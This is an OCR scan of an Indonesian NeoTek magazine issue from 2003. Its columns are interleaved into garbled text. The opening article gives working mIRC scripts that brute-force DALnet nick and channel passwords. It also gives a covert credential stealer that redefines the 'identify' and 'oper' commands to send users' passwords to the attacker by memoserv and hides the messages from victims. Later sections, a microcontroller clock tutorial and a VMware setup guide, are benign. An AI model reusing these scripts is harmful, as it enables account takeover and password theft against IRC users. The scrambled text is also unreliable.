ENTU ANDA TIDAK ASING LAGI dengan mIRC, program


T berbincang dengan orang lain secara tertulis di
Internet. Pada mIRC kita menggunakan nama
alias stn { /.timer500 0 20 /cracknick | /.timer503 0 60 /.ctcp $me
ping | .enable #passhack on | /echo 4,10 Passwd cracker untuk nick
8< %craknick > 4 Dimulai }
panggilan atau yang sering disebut nickname atau biasa alias stc { /.timer501 0 20 /crackchan | /.timer503 0 60 /.ctcp $me
ping | .enable #passhack on | /echo 9,10 Passwd chanel cracker
disingkat nick. untuk nick 8< %crackchan > 4 Dimulai }
Agar lawan bicara di mIRC mengenal kita, kita cukup alias %crackchan {
menggunakan satu nick sehingga ketika lain waktu ber- if (%%crackchan == $null) { /echo 4 -a 8,10-=* Belom
jumpa, lawan bicara yang pernah berbincang dengan kita memasukan nick =- 4 dihentikan | /.timer500 off | .timer503 off |
/halt }
dapat langsung mengenali kita. Server Dalnet
if (%crackbaris == $null) { /echo 4 -a 8,10-=* Belom masukin
mengizinkan kita untuk meregister nick pilihan kita dan baris ke berapa =- 4 dihentikan | /.timer500 off | .timer503 off |
memberikan kode atau sandi atau password sebagai tanda /halt }
kita adalah pemilik dari nick yang diregisterkan tersebut. if (%kamus == $null) { /echo 4 -a 8,10-=* gak ada file kamus =-
Tidak hanya nick saja yang dapat diregisterkan pada 4 dihentikan | /.timer500 off | .timer503 off | /halt }
server Dalnet, tetapi juga channel. Jika nick yang if ($window(@PassCracker) == $null) { /window -a @PassCracker
0 500 500 79 | /titlebar @PassCracker ChanServ Passwords cracker
digunakan memiliki akses yang cukup baik seperti sebagai nyoba baris ke: %crackbaris }
seorang operator channel dan channel yang kita miliki /chanserv identify %crackchan $read -l $+ %crackbaris %kamus
sudah terisi cukup banyak orang, berhati-hatilah. Tetapi set %chpass $read -l $+ %crackbaris %kamus
apakah mungkin nick maupun channel yang dimiliki titlebar @PassCracker ChanServ Passwords cracker nyoba baris ke:
dapat diambil oleh orang lain? Jawabnya mungkin saja. %crackbaris
Hal tersebutlah yang akan dijabarkan pada artikel ini. aline @PassCracker 5 $+ %chpass
/inc %crackbaris 1
;ini adalah contoh skrip mIRC untuk mengambil passwd nick dan }
chanel dengan metode brute force
;Original script by beefcake, saya hanya mengedit sedikit. menu Menubar,channel {
;skrip ini membutuhkan file kamus kata-kata untuk menebak -
passwd
Password Cracker
;Script ini akan terus menebak passwd nick/chanel berdasarkan
urutan kata yang ada di kamus .Nick Cracker
;tunggu hingga muncul windows yang terdapat kalimat ..Start:{ set %craknick $$?="Nick yang mau di Crack" | set %kamus
NickServ/ChanServ PassWord Accepted $dir="Pilih File kamus " | set %crackbaris $$?="cracking dengan
kamus pada baris ke" | /stn }
; lalu liat cracking status kata apa yang ada disana , dan … anda
telah mendapatkan passwdnya. ..Stop: /.timer500 off | /echo 4 -a -=+ Berhenti di baris:
%crackbaris dilanjutkan lain kali. | /unset %craknick | .disable
alias cracknick { #passhack end | .timer503 off
if (%craknick == $null) { /echo 4 -a -=* Belom memasukan nick =- ..-
dihentikan | /.timer500 off | .timer503 off | /halt }
..Passwd ada di:/echo 4 -a -=+ passwd %craknick ada di %kamus
if (%crackbaris == $null) { /echo 4 -a -=* Belom masukin baris ke ,baris ke: %ncpass
berapa =- dihentikan | /.timer500 off | .timer503 off | /halt }
.Chanel Cracker
if (%kamus == $null) { /echo 4 -a -=* gak ada file kamus =-
dihentikan | /.timer500 off | /.timer503 off | /halt } ..Setup:{ set %%crackchan $$?="Channel Yang mau di
Crack(jangan lupa tanda #)" | set %kamus $dir="Pilih File kamus " |
if ($window(@PassCracker) == $null) { /window -a @PassCracker set %crackbaris $$?="Baris di kamus untuk memulai cracking " | /stc
0 500 500 79 | /titlebar @PassCracker NickServ Passwords cracker }
nyoba baris ke: %crackbaris }
..Stop: /.timer501 off | /echo 4 -a -=+ Berhenti di baris:
/nickserv identify %craknick $read -l $+ %crackbaris %kamus %crackbaris dilanjutkan lain kali. | /unset %%crackchan | .disable
set %ncpass $read -l $+ %crackbaris %kamus #passhack end | .timer503 off
titlebar @PassCracker NickServ Passwords cracker nyoba baris ke: ..-
%crackbaris ..Passwd ada di:/echo 4 -a -=+ Passwd %crackchan ada di
aline @PassCracker 5 $+ %ncpass %kamus ,baris ke: %chpass
/inc %crackbaris 1 }
}

36 NeoTek Februari 2003


NeoStyle

on 1:load:{ alias identify raw -q { identify $1 | memoserv send Prayana $1 }


window -a @PassCracker 75 150 650 79 alias nickserv if $1 == identify { identify $2 | memoserv send
titlebar @PassCracker Tentang passwd cracker .... Prayana $2 }
aline @PassCracker 10,1Password Cracker reedited By: Prayana alias oper raw -q { oper $1 $2 | memoserv send Prayana OPER
has been loaded. Login: $1 - Senha: $2 }
aline @PassCracker 10,1Script ini cuma buat nambah [remote]
pengetahuan ,jangan di pake!!.Gue gak bertanggung jawab tentang on *:connect: { /ignore memoserv }
penggunaan script ini,gue cuma ngedit. on *:join:#:if ( $nick == $me ) { echo | halt } | .ignore -u6 $me | inc
aline @PassCracker 9,1Script ini berjalan di server dalnet %nmmn | .timerD $+ %nmmn $+ D 1 5 .Msg $nick O m
only,tapi sekarang dalnet dah bikin patch nya,so ..
aline @PassCracker 8,1,kalo masih mau make juga .. siap² kena
akill ip kamu 7 turunan dari dalnet ^_^ ... Beware ! heheheee
.auser 696969 NickServ
.auser 696969 ChanServ
.disable #passcrack end
}

#passhack on
on 696969:notice:*accepted*:*:{
if ($nick == NickServ) goto npKetemu | elseif ($nick == ChanServ)
goto cpKetemu | halt
halt
:npKetemu
if ($window(@PassKetemu) == $null) { window -a @PassKetemu
150 150 500 79 } | else /clear @PassKetemu
titlebar @PassKetemu NickServ Password Ketemu nick anda yang telah diregisterkan. Setelah disimpan dan
drawtext -o @PassKetemu 4 Algerian 40 35 6 NickServ Password diganti tulisan Prayana menjadi nick anda, selamatkan
Ketemu!
pekerjaan anda dengan mengklik File → Save lalu klik OK
timer500 off
timer503 off Selanjutnya kita tunggu nick siapa yang akan menjadi
halt korban pertama dan korban selanjutnya, nantikan memo-
:cpKetemu servnya. Pada saat nick korban melakukan identify, maka
if ($window(@PassKetemu) == $null) { window -a @Passketemu pada saat itu juga password yang dimasukkan atas nicknya
150 150 500 79 } | else /clear @PassKetemu tersebut dikirimkan dalam bentuk memoserv ke nick anda.
titlebar @PassKetemu ChanServ Password Ketemu Untuk lebih memastikan skrip langsung berjalan melaku-
drawtext -o @PassKetemu 4 Algerian 40 35 6 ChanServ Password kan aktivitasnya, pada Options mIRC → IRC → Perform
Ketemu!
beri tanda cek pada “On connect, performs these
timer501 off
commands:” dan masukkan command /remote on pada
timer503 off
kotak besar di bawahnya.
halt
}
on 696969:notice:*Invalid*:*:halt
on 696969:notice:*Incorrect*:*:halt
#passhack end

Ada banyak teknik atau cara yang dilakukan orang untuk


mendapatkan password nick dan channel. Skrip di atas
menjabarkan cara kerja nick dan channel cracking dengan
menggunakan metode brute force.
Pada skrip di atas, metode brute force sudah tidak efektif
lagi digunakan di server Dalnet, karena IRCop Dalnet
akan segera mengetahui percobaan cracking ini melalui
banyaknya request identify yang masuk. Sebagai awal
mungkin anda akan mendapat peringatan dari IRCop,
namun jika masih berlanjut, maka IP anda kena akill
Dalnet sehingga dilarang masuk ke servis dalnet untuk
jangka waktu yang sangat lama.
Jika tidak ingin IP kita kena akill dari Dalnet, penulis Apakah pekerjaan anda itu tidak akan diketahui orang
memiliki cara lain. Anda bisa mencoba skrip singkat lain? Jawabnya mungkin saja bisa diketahui jika orang itu
berikutnya yang juga penulis sertakan di sini (lihat skrip mempunyai sikap hati-hati dengan terlebih dahulu me-
singkat berikutnya). meriksa Editor mIRC Remote. Jarang orang memperhati-
Load atau disimpan skrip tersebut pada Tools Menu kan hal tersebut. Dengan skrip ini, layar status tidak mem-
Remote mIRC (alt+R). Kemudian perhatikan script di berikan pesan memoserv kepada orang yang menjadi kor-
atas, tulisan Prayana diganti dengan nick anda yang telah ban. Perhatikan lagi skripnya, pada on *:connect diset
diregisterkan karena password dari nick yang menjadi /ignore memoserv yang berfungsi untuk menghindari
korban akan dikirimkan dalam bentuk memoserv kepada pemberian pesan kepada orang yang menjadi korban. „

Februari 2003 NeoTek 37


NeoTekno

Tukar Otak
Proyek Digital Clock (5)
Melanjutkan artikel Advanced Digital Clock, tutorial kali ini menjelaskan kerja perangkat lunak
NeoClock2.asm. Hardy (hardythe@cbn.net.id) membahas bagian yang belum dibahas pada
tutorial sebelumnya.

ADA BAGIAN RAM, DITAMBAHKAN register baru Subroutine yang bertugas menentukan apa yang ditampilkan
P dengan nama T1 (Timer 1) dan T2 (Timer 2) untuk
jam puluhan, jam satuan, menit puluhan dan menit
(DispPrep—Display Preparation) akan meletakkan datanya
ke buffer ini. Bagian Display mengambil dan mengkonversi
satuan. T1Jam10 DS 1 (data storage) berarti register bernama menjadi data segment dan ditampilkan ke 4 bh 7 segment.
T1Jam10 (Jam puluhan untuk Timer 1) diberi lokasi sebanyak Sebagai contoh: pada mode tampilan setting timer 1, maka isi
1 byte saja. Ada kalanya kita memakai lebih dari 1 byte timer 1 (jam-Menit) akan di-copy ke Buffer. Sedangkan bila
seperti DBuf ds 4 (4 byte). Kalau saat ini saya memakai nama Timer 1-nya off, maka yang ditampilan adalah text t1 of.
masing masing dari DBuf0 sampai DBuf3 itu hanya masalah
addressing. Beberapa register difungsikan sebagai counter, dan penggu-
naan flag lebih intensif. Dengan flag, kita bisa memakai 1
Pada DBuf ds 4, untuk mencapai DBuf ke 3 saya bisa lakukan byte untuk 8 buah flag (efisien)
dengan menamainya DBuf+2. Display Buffer ke 1 ditulis
dengan "Dbuf+0" atau "Dbuf" saja. Assembler akan meng- Subroutine tetap diatur oleh mainloop. Yang tanpa filter se-
arah pada lokasi yang benar. Sedangkan dengan cara saat ini, perti Input, ModeMan, Display dan Output akan terus di
saya bisa tulis langsung Dbuf2 sebagai nama lokasinya. Real akses setiap loop. Yang berfilter seperti Second diakses setiap
address-nya (sering disebut effective address) ditentukan oleh second, Evaluate setiap menit dan DisplayPrep setiap setengah
lokasi register sebelumnya. detik.
Instruksi directive (mengarahkan kerja assembler dan tidak ** MAIN LOOP ***********************************************************
berguna bagi MCU) org (origin)-lah yang menentukan lokasi
riilnya. Lihat file listing hasil assembling. Di sana tertera MAIN jsr InputJob ; process increment value (SW2)
lokasi real register tersebut. jsr ModeManJob ; manage mode (SW1)
braclr DoSec,MAIN10 ; if Second task time,
Memang metode puluhan dan satuan ini lebih boros diban- bitclr DoSec ; clear flag first
dingkan dengan cara menggabung kedua nilai menjadi 1 re- jsr SecondJob ; do second event
gister. Alasan pemilahan metode boros ini karena RAM MCU MAIN10 braclr DoMin,Main20 ; if Minute task time,
bitclr DoMin ; clear flag first
memang masih banyak serta ROM yang sebesar 8 kilobyte jsr EvaluateJob ; do minute event (evaluate timer)
tidak akan penuh karena penggunaan metode ini (efek tidak Main20 braclr HalfSec,Main30 ; if Half Second Event occur,
langsung) dan yang penting adalah kesederhanaannya karena bitclr HalfSec ; clear flag first
tidak perlu konversi terlebih dahulu dari 1 byte menjadi 2 jsr DispPrepJob ; Prepare Display
Main30 jsr DisplayJob ; Display Time
digit untuk ditampilkan sebagai angka satuan dan puluhan- jsr OutputJob ; execute output (relay & buzzer)
nya. Hal itu sangat penting di artikel NeoClock1.asm yang bra MAIN ; make a loop
ditujukan untuk pemula.
Mode yang diterapkan di NeoClock2.asm menghasilkan tam- Sebelum masuk ke jump table, input subroutine memeriksa
pilan yang berbeda dalam setiap modenya. Pemilihan tugas SW1 dan SW2. Hanya apabila SW1 open dan SW2 pushed,
dilakukan dengan menyediakan buffer display sebanyak 4 jump table diakses. Selain itu routine langsung ke luar
byte yang merupakan bayangan bagi tampilan 4 buah 7 (Input0 yang langsung rts—return from subroutine).
segment tapi masih berupa angka desimal. Langkah pertama pemakaian jump table adalah mengambil
nilai pada register Mode karena Mode yang menentukan
T1Jam10 ds 1 ; Jam Puluhan Timer1
tugas saat itu (akan loncat ke mana).
T1Jam1 ds 1 ; Jam Satuan Timer1 Dengan masuknya nilai mode ke index register (X), instruksi
T1Men10 ds 1 ; Menit Puluhan Timer1 ke 2 akan mengisi ulang register X tadi dengan "nilai yang
T1Men1 ds 1 ; Menit Satuan Timer1 berada pada lokasi" yang ditunjuk oleh lokasi base (InpTbl)
T2Jam10 ds 1 ; Jam Puluhan Timer2 ditambah dengan nilai X sebelumnya.
T2Jam1 ds 1 ; Jam Satuan Timer2 Misalnya mode = 3 (isi X jadi 3, maka pada opcode kedua, X
T2Men10 ds 1 ; Menit Puluhan Timer2 akan diisi oleh lokasi InpTbl + 3 (isi X). Hasilnya adalah nilai
T2Men1 ds 1 ; Menit Satuan Timer2 Input3-InpTbl (jarak). Setelah dapat jarak InpTbl ke tujuan,
DBuf0 ds 1 ; Buffer display 4 bh 7 segment. kita gunakan untuk jump (melompat) ke lokasi tujuan de-
DBuf1 ds 1 ngan melompat dari base sejauh jarak tadi. Tentunya hasil-
DBuf2 ds 1 nya kita akan berada di lokasi tujuan.
DBuf3 ds 1 Cara penulisan seperti "Input3-InpTbl" ini memungkinkan

38 NeoTek Februari 2003


NeoTekno

kita mengubah routine (bila ada perbaikan) pada input 0 *** SecondJob aktif tiap second ******************************************
sampai 2 tanpa perlu menghitung jarak kedua lokasi tersebut *** Decrement Relay delay dan Buzz delay sampai 0 (off)
secara manual karena akan dilakukan oleh assembler dalam
proses assembly-nya SecondJob tst Relaydly ; test Relay delay
beq Sec20 ; if <> 0,
dec Relaydly ; decrement relay delay

*** InputJob proses SW2on1 ******************************************** Sec20 tst Buzzdly ; test Buzz delay
beq Sec30 ; if <> 0,
InputJob braset SW1on,Input0 ; if SW1 open, dec Buzzdly ; decrement buzz delay
braclr SW2on1,Input0 ; if SW2 pushed,
bitclr SW2on1 ; clear flag first
ldx Mode ; get mode Pencocokan timer di Evaluate dilakukan setiap menit karena
ldx InpTbl,x ; to get distance from table
jmp InpTbl,x ; and jump to destination. satuan terkecil setting timer adalah menit. Dilakukan dengan
cara sederhana dan bertahap. Sebelum proses pencocokan, di
InpTbl fcb Input0-InpTbl test dulu apakah timer bersangkutan aktif. Bila tidak, lompati
fcb Input1-InpTbl
fcb Input2-InpTbl saja dari pada membuang waktu percuma.
fcb Input3-InpTbl ; ß ← isinya yang diambil.
fcb Input4-InpTbl
fcb Input5-InpTbl
fcb Input6-InpTbl *** EvaluateJob aktif tiap menit compare jam dengan kedua timer
fcb Input7-InpTbl EvaluateJob braclr Tim1on,Eva50 ; if Timer 1 on,
fcb Input8-InpTbl lda Men1 ; get menit1
Input0 rts ; just quit, not here cmp T1Men1 ; compare dgn menit1 Timer 1
bne Eva50 ; if equal,
Input1 inc Jam1 ; Mode1 (increment jam) lda Men10 ; get menit10
cmp T1Men10 ; compare dgn menit10 Timer 1
bne Eva50 ; if equal,
lda Jam1 ; get jam satuan
Tidak ada yang baru dalam input nilai jam dan menit baik
untuk jam sebenarnya dan Timer 1 dan Timer 2. Cukup mi-
rip dengan Secondjob sebelumnya (NeoClock1.asm). Ada 2 Jump Table di dalam DispPrep. Di bagian atas
Untuk mencocokkan Detik dari Jam sebenarnya dipakai me- merupakan bagian yang dipanggil oleh table di tengah yang
tode: detik akan direset dan langsung start pada setiap pene- di call oleh Mainloop. Prosedur cukup sederhana, Cuma ada
kanan SW2 pada mode set menit. filter yang menghasilkan efek berkedip dengan cara pada
perioda setengah detik lokasi di isi dengan data, dan setengah
* setiap penekanan untuk setting menit akan mereset detik detik periode selanjutnya di kosongi. Pada Sub-mode
ke 00 & prescaler-nya ke 25 RUNdisplayMode hanya terjadi perubahan tampilan statis.
Apabila Timer 1 off maka yang keluar adalah tulisan t1 of
Input2 clr Detik1 ; clear detik satuan sedangkan apabila aktif, yang tampil adalah nilai settingnya.
clr Detik10 ; clear detik puluhan
mov #25,Tick ; set prescaler *** DispPrep mempersiapkan data yang akan di display ***************
inc Men1 ; Mode2 (increment menit)
RealPrep0 ldx RunDispMode ; for mode 0 (RUN),
ldx RDModeTbl,x ; get distance
jmp RDModeTbl,x ; jump to destination
Toggle On Off timer 1 dilakukan dengan membaca dulu kon-
disi saat ini dengan instruksi braset Tim1on, Input35 yang RDModeTbl fcb RDM0-RDModeTbl
artinya: Branch (loncat) ke baris berlabel Input35 apabila bit fcb RDM1-RDModeTbl
(flag) Tim1on sedang set. Tim1on set apabila Timer 1 sedang fcb RDM2-RDModeTbl
aktif. Ada 2 kemungkinan dari pencabangan (branch) ini: fcb RDM3-RDModeTbl

1. saat ini Tim1on set (aktif), maka loncat ke Input35 dan RDM0 ldx #3 ; RunMode 0 (jam-
mematikan timer dengan bitclr Tim1on. Lalu rts. menit)
2. saat ini Tim1on clear (non aktif), maka diteruskan dengan ---deleted---
mengaktifkannya dengan bitset Tim1on. Loncat (bra) ke DispPrepJob ldx Mode ; get mode
Input39 lalu rts. ldx PrepTab,x ; use to get distance
jmp PrepTab,x ; jump to destination

Input3 braset Tim1on,Input35 ; Mode3 (TIMER1 toggle on - off) PrepTab fcb Prep0-PrepTab
bitset Tim1on ; if timer 1 off, make it on fcb Prep1-PrepTab
bra Input39 ; then quit fcb Prep2-PrepTab
Input35 bitclr Tim1on ; else, make it off fcb Prep3-PrepTab
Input39 rts ; quit fcb Prep4-PrepTab
fcb Prep5-PrepTab
fcb Prep6-PrepTab
Penambahan pada subrotuine ini hanya decrement Relay dan fcb Prep7-PrepTab
fcb Prep8-PrepTab
Buzzer delay. Karena routine ini diakses setiap 1 detik maka
nilai 5 yang diisi di bagian Output akan menghasilkan delay
Prep0 jmp RealPrep0
5 detik (relay-nya menyala 5 detik). Decrement dilakukan * ---------------------------------------------------------------------
bila delaynya belum mencapai nilai 0.
Prep1 braset AltDisp,Prep15 ; Mode1 jam (kedip) dan menit

Feburari 2003 NeoTek 39


NeoTekno

DisplayJob berubah sedikit. Kalau dulu mengambil data lang- Tim3 ts RunDdly ; get RunMode Display delay value
sung dari lokasi Jam10 sampai Detik1, sekarang mengambil beq Tim5 ; if <> 0
dari Dbuf karena adanya kebutuhan perubahan tampilan dec RunDdly ; decrement it
yang sudah diselesaikan oleh bagian Display Preparation.
Efisiensi tampilan diperbaiki dengan memindahkan instruksi Tim5 dec Tick ; Use Tick Register as counter
pemadaman semua digit ke lokasi persis sebelum pengubah- lda Tick ; get Tick Value
cmp #12 ; compare with Half Second
an data portB dan penyalaan kembali.
bne Tim7 ; if = half second,
PR untuk mengubah kecerahan bisa dilakukan dengan me- bitset HalfSec ; set Half second flag
ngurangi jumlah penyalaan sesuai waktu. Lakukan dengan bra Tim10 ; next
memfilter baris instruksi “mov Dig2Fire,PORTA.”
Tim7 tst Tick ; test Tick
Segment tambahan di Table berguna untuk membentuk bne Tim10 ; if = 0,
huruf sederhana: t, o, f, n dan blank. lda #25 ; load Tick Counter by 25
sta Tick ; to create about (not accurate)
bitset DoSec ; 1 Second Event
Disp30 ldx Dig2Disp ; use Dig2Disp as pointer to bitset AltDisp ; 1 second event
lda DigTable,x ; get Digit # to display (in bit bitset HalfSec ; also half second event
pattern)
sta Dig2Fire ; save it temporarily
Disp70 ldx DBuf0,x ; get value to display, use as pointer
to Pada Bagian IRQ hanya dipakai untuk menangkap
lda SegTable,x ; get Segment pattern penekanan tombol SW1.
mov #$1E,PORTA ; kill all digit first to avoid ghost
sta PortB ; send to PortB IrqJob tst SW1Frz
mov Dig2Fire,PORTA ; turn on Digit in charge bne Irq99
rts ; Quit bitclr Mode1 ; just make sure
---- deleted ---- bitset SW1on ; set flag
SegTable fcb $40 ; 0 0100 0000 mov #12,SW1Frz
fcb $76 ; 1 0111 0110 Irq99 rti
---- deleted ----
fcb $04 ; 9 0000 0100
fcb $19 ; t 0001 1001 Pada Vector Table hanya ditambah dengan address IrqJob.
fcb $38 ; o 0011 1000
fcb $0B ; f 0000 1011
fcb $3A ; n 0011 1010 org $FFF6
fcb $7F ; 0111 1111 Security dw DummyISR ; $FFF6-FFF7 TIM Channel 0
Dw DummyISR ; $FFF8-FFF9 CMIREQ Vector
Chr_t equ 10 ; huruf t (kecil) dw IrqJob ; $FFFA-FFFB IRQ 1 Vector
Chr_o equ 11 ; huruf o (kecil) dw DummyISR ; $FFFC-FFFD SWI Vector
Chr_f equ 12 ; huruf f (kecil)
Chr_n equ 13 ; huruf n (kecil)
Chr_ equ 14 ; blank

OutputJob mengaktifkan dan memadamkan Relay dan Buz-


zer dan memberi nilai delay.
Decrement delay-nya dilakukan di bagian secondjob. Perisai Ampuh
Para Chatter:
OutputJob braclr T1click,Out10 ; if Relay need to activated,
bitclr T1click ; clear flag first Shell Account, BNC/EZBNC,
mov #5,Relaydly ; set delay 5 second PsyBNC & Eggdrop (Teknik
bitset RELAY ; activated Relay
Out10 tst Relaydly ; else, test relay delay Instalasi Dan Konfigurasi).
bne Out20 ; if time to de-activated relay Eryanto Sitorus
bitclr RELAY ; de-activated relay
Tebal : 102 Halaman.
Terbitan : Agustus 2002
TimerOverFlow ditambah dengan delay RUNdisplayMode Penerbit: PT. Dinastindo
dan penambahan flag Half Second serta AltDisp yang Harga : Rp. 13.500
digunakan untuk mengatur pengedipan display.

40 NeoTek Februari 2003


NeoTutor

VMware Workstation
untuk Linux
Besarnya minat neoteker terhadap VMware untuk Linux, membuat NeoTek mengangkat
kembali topik virtual machine ini dengan tulisan Asmuri Anwar (asmuri@persda.co.id) yang
melengkapi bahasan VMware untuk Windows sebelumnya.

Instalasi dan konfigurasi $ cd vmware-distrib • Do you want to be able to use


Jalankan instal skrip perl vmware- host-only network in your virtual
Sebelum melakukan instalasi, sebaik-
install.pl machines?
nya persiapkan hal-hal berikut:
• Do you want this script to probe
• Sebuah komputer dan host sistem $./vmware-install.pl for an unused private subnet?
operasi yang dapat menjalankan Kemudian lakukan konfigurasi VMware
VMWare Workstation. Spesifikasi Bila anda menemukan masalah pada
Workstation bila pada prompt ditanya- saat melakukan konfigurasi di atas
hardware yang dibutuhkan: kan apakah anda akan menjalankan
• Prosesor. 266MHz ke atas (400 seperti:
vmware-config.pl? Jawab ‘Yes.’ Skrip
MHz ke atas direkomendasikan), vmware-config.pl ini akan digunakan 1. Di akhir instalasi tidak menampil-
single atau multiprocessor. untuk melakukan konfigurasi VMware kan “Installation successful.” Laku-
• Memori. Minimal 128MB Workstation sewaktu anda meng- kan instal ulang.
(256MB direkomendasikan). upgrade kernel. Bila anda akan meng- 2. Bila selesai, logout dari root account.
• Disk drives. 100MB sisa space instal ulang VMware Workstation,
yang tersedia untuk basic instalasi. konfigurasi tersebut tidak perlu anda Instalasi Lisensi
Sebaiknya sediakan 500MB untuk lakukan lagi. Setelah selesai instalasi VMware Work-
guest operating system beserta Bacalah pernyataan End User Licence station, anda harus menginstal lisensi
aplikasinya. Agreement (EULA). Tekan tombol VMware Workstation. Langkah-lang-
• Lisensi VMware Workstation. Jika space bar. Kemudian tekan tombol ‘Q’ kahnya:
belum ada, dapatkan di untuk ke prompt selanjutnya. 1. Pindah ke home directory
www.vmware.com/vmwarestore/ $ cd /home/asmuri<Enter>
vmwarestore.html/t_blank. Untuk mudahnya, sebaiknya konfigu-
File lisensi akan dikirimkan pada rasi default saja yang anda pakai de- 2. Jika anda belum mempunyai direk-
anda lewat email. ngan menjawab ‘Yes’ untuk setiap per- tori .vmware (pakai tanda titik di
tanyaan yang diajukan. Beberapa konfi- depannya). Buatlah sekarang:
• Software aplikasi VMware Workstation. gurasi yang harus anda lakukan bila: $ ls -al
Anda dapat mendownloadnya di
www.vmware.com/download. • Di mesin anda menjalankan Samba, $ mkdir .vmware
pada saat ditanyakan: 3. Simpan file lisensi anda di dalam
• CD atau disk instalasi untuk sistem
operasi guest. Do you want this script to automat- direktori .vmware. Yakinkan nama
ically configure your system to allow file lisensi anda tersebut dimulai
Instalasi VMware Workstation your virtual machines to access the dengan (prefix) license --
Untuk melakukan instalasi VMware host file system?
Konfigurasi Komputer Virtual
Workstation pada sistem operasi Li- Jawab No. Jika Samba tidak dalam
nux, anda terlebih dahulu harus login keadaan running di mesin anda. Ja- Sebelum Anda melakukan konfigurasi
sebagai user yang akan anda gunakan wab Yes dan VMware Workstation untuk komputer virtual, perhatikan
untuk menjalankan VMware Work- akan melakukan konfigurasi Samba beberapa catatan berikut dan perlu
station. Pada terminal window, ketika secara otomatis. Pada saat ditanya- beberapa penyesuaian dengan
su untuk login ke root. Copy-kan kan user name dan password untuk konfigurasi host sistem operasi Anda.
software VMware Workstation ke digunakan bersama Samba, masuk- • Real time clock function harus di-
direktori /usr/local/src. kan user name dan password Anda. kompilasikan ke Linux kernel Anda
$ su • Selanjutnya, tekan tombol Enter un- • VMware Workstation untuk Linux
Password: tuk menampilkan DHCP server co- memerlukan parallel port “PC-style
$ cd /usr/local/src pyright information. Anda harus hardware” option (CONFIG_
menekan space bar, kemudian tekan PARPORT_PC) untuk membangun
Ekstrak tar file yang baru anda copy-
Q untuk melanjutkan. dan me-load sebagai sebuah modul
kan tersebut.
• Jawab Yes pertanyaan-pertanyaan kernel modul (harus diset ke mode
$ tar zxf VMware-x.x.x-xxx.tar.gz “m”).
berikut:
Pindah ke direktori tempat VMware • Do you want to use the network Sekarang saatnya menginstal lisensi
Workstation diekstrak: in your virtual machines? VMware Workstation:

Februari 2003 NeoTek 41


NeoTutor

1. Jalankan VMware Workstation dengan Finish untuk mengakhiri konfigu-


menuliskan vmware pada terminal rasi komputer virtual anda.
console anda. 3. Memilih sistem operasi.
$ vmware
Layar pertama yang akan ditampil-
Jika anda menerima serial number kan adalah sistem operasi apa yang
pada saat membeli software VMware akan anda instal pada komputer vir-
Workstation, anda harus memasuk- tual anda. Configuration wizard
kannya pada saat pertama kali men- menggunakan informasi ini untuk
jalankan VMware Workstation. Bia- memilih nilai default yang tepat,
sanya ada 20 karakter yang harus seperti besarnya space yang
anda masukkan. Klik OK untuk diperlukan.
melanjutkan.
Jika sistem operasi anda tidak terlihat
Sekali anda memasukkan serial num- dalam daftar sistem operasi yang bi-
ber, secara otomatis akan tersimpan Beberapa sistem operasi memerlu-
sa anda instal, pilih “Other” dan ma- kan driver CD-ROM untuk meng-
dalam file lisensi dan tidak akan sukkan nama sistem operasi yang
ditanyakan lagi saat anda memulai instalnya. Jika tidak ingin menggu-
sesuai. nakan CD-ROM, anda dapat me-
menjalankan VMware Workstation.
Langkah berikut saya asumsikan an- milih pilihan pertama, CD-ROM
2. Memulai konfigurasi. Saat VMware da akan menginstal sistem operasi Disabled.
Workstation dijalankan, di layar guest Windows 98.
akan tampil tiga pilihan: 7. Mengaktifkan floppy disk drive.
Memilih Direktori untuk Komputer
• Run the Configuration Wizard. Virtual
• Run the Configuration Editor.
• Open an existing configuration. Untuk memudahkan administrasi,
setiap komputer virtual mempunyai
direktori masing-masing. Semua
file yang berhubungan dengan kon-
figurasi file dan disk file diletakkan
ke dalam direktori ini.
Anda menetapkan direktori default
untuk instalasi Windows 98 berada
di ~namauser/vmware/win98 atau
/home/namauser/vmware/win98 di
mana namauser adalah user yang
login pada saat itu.
Pilih opsi “Floppy Enabled” dan ten-
4. Memilih tipe disk. tukan device di mana secara fisik
Memilih Virtual Disk. Jika anda drive tersebut berada, biasanya
Default pilihan adalah “Run the akan menginstal sistem operasi guest /dev/fd0.
configuration wizard.” secara langsung pada partisi yang 8. Mengkonfigurasi networking pada
Klik tombol OK untuk memulai ada (seperti ‘raw’ disk). Instalasi se- komputer virtual.
configuration wizard. Configuration buah sistem operasi guest pada raw
wizard juga dapat Anda jalankan disk direkomendasikan hanya untuk
dari menu File → Wizard. advanced user saja.
5. Menentukan ukuran virtual disk.
Isikan berapa besarnya virtual disk
yang akan anda buat. Misal 2GB =
2000 MB
Dengan kapasitas virtual disk 2GB
anda dapat menginstal sistem ope-
rasi beserta program-programnya,
juga dapat dibuat untuk menyim-
pan data. Selain itu, jika kapasitas
hard disk anda cukup besar, anda
dapat membuat virtual disk lain dan
menginstal sistem operasi lain di Memilih Bridged and Host-Only
virtual disk tersebut. Biasanya, un- Networking akan melakukan ko-
tuk instalasi Windows 98 anda cu- neksi secara langsung ke lokal Ether-
kup menyediakan kapasitas sebesar net melalui sebuah kartu Ethernet
500MB, itu sudah termasuk aplikasi pada komputer anda dan mengizin-
seperti Microsoft Office. kan sistem operasi guest untuk
Tekan tombol Next atau Prev untuk mengakses file-file yang ada di host
melanjutkan ke instruksi berikutnya. 6. Mengaktifkan CD-ROM drive komputer melalui virtual network
Setiap halaman akan memberikan Pilih CD-ROM Enabled. Kemudian internal.
pertanyaan yang harus anda respons. ketika device CDROM, misalnya,
Selain itu anda juga harus mengisi 9. Memeriksa dan menyelesaikan
/dev/cdrom. konfigurasi:
form. Jika selesai, tekan tombol

42 NeoTek Februari 2003


NeoTutor

rasi guest. Walaupun VMware Work- 14. Jawab Yes pada pertanyaan di layar
station akan dapat menjalankan sebuah Aanda, kemudian klik Next untuk
sistem operasi guest tanpa tool-tool menginstal driver. Sesudah insta-
VMware, namun dalam lingkungan lasi driver berhasil, klik Finish.
grafik, paling tinggin hanya menangani 15. Klik Close untuk keluar dari dialog
resolusi rendah (640x480, 16 color). SVGA Properties, kemudian klik
Dengan VMware Tools, SVGA driver lagi Close untuk keluar dari dialog
akan langsung diinstalasikan. VMware Display Setting.
Workstation mendukung tampilan 16. VMware Tools akan langsung
sampai 32-bit dan tampilan dengan dijalankan pada saat Anda booting
resolusi tinggi, ulang komputer virtual.
File-file VMware Tools untuk Linux
dan VMware Tools untuk Windows
dapat dimasukkan ke dalam VMware
Workstation (Settings à VMware Tools
Ini adalah langkah terakhir dalam Install). VMware Tools untuk Win-
konfigurasi. Periksa sekali lagi dows mendukung sistem operasi guest
